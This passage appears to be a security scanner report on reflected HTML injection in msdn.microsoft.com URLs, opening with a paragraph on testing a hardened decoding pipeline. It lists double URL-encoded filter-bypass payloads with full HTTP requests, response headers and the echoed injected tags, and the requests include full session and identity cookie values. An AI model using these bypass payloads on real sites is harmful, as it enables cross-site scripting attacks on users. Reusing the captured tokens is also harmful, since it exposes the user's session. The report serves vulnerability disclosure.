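Run stand-alone, the vulnerable pipeline reports the single-encoded probe as blocked but parses the double-encoded one into two start tags, input and a: the filter inspected dae2f%22%3e%3ca%3e4fee7d32026, which contains none of the blocked characters, and the second decode then turned it into dae2f"><a>4fee7d32026 inside the attribute. The hardened pipeline parses the same probe into the single input tag, and with keep_custom_decode=True the filter rejects it because it now sees the canonical value. The output encoding is defence in depth: it does not depend on the filter being complete.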
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f16d6%2522%253e%253ca%253edf793d40793 was submitted in the REST URL parameter 1. This input was echoed as f16d6"><a>df793d40793 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-usf16d6%2522%253e%253ca%253edf793d40793/library/bb871518.aspx HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9199
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:12:45 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-usf16d6"><a>df793d40793/library/bb871518" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8490f%2522%253e%253ca%253e2ba8dfb9f97 was submitted in the REST URL parameter 2. This input was echoed as 8490f"><a>2ba8dfb9f97 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library8490f%2522%253e%253ca%253e2ba8dfb9f97/bb871518.aspx HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=...[SNIP]...&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9199
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:12:53 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library8490f"><a>2ba8dfb9f97/bb871518" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69909%2522%253e%253ca%253e23caee0588 was submitted in the REST URL parameter 3. This input was echoed as 69909"><a>23caee0588 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library/bb871518.aspx69909%2522%253e%253ca%253e23caee0588 HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=...[SNIP]...&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9208
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:13:03 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/bb871518.aspx69909"><a>23caee0588" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8b435%2522%253e%253ca%253e05423347fd7 was submitted in the REST URL parameter 1. This input was echoed as 8b435"><a>05423347fd7 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us8b435%2522%253e%253ca%253e05423347fd7/library/bb871519.aspx HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=...[SNIP]...&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9199
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:12:43 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us8b435"><a>05423347fd7/library/bb871519" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f98e4%2522%253e%253ca%253eb5a34807f69 was submitted in the REST URL parameter 2. This input was echoed as f98e4"><a>b5a34807f69 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/libraryf98e4%2522%253e%253ca%253eb5a34807f69/bb871519.aspx HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=...[SNIP]...&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9199
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:12:52 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/libraryf98e4"><a>b5a34807f69/bb871519" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 54530%2522%253e%253ca%253e0117325841e was submitted in the REST URL parameter 3. This input was echoed as 54530"><a>0117325841e in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library/bb871519.aspx54530%2522%253e%253ca%253e0117325841e HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=...[SNIP]...&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9209
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:13:02 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/bb871519.aspx54530"><a>0117325841e" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61c4c%2522%253e%253ca%253eee87a223ebb was submitted in the REST URL parameter 1. This input was echoed as 61c4c"><a>ee87a223ebb in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us61c4c%2522%253e%253ca%253eee87a223ebb/library/cc295789.aspx HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=...[SNIP]...&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; 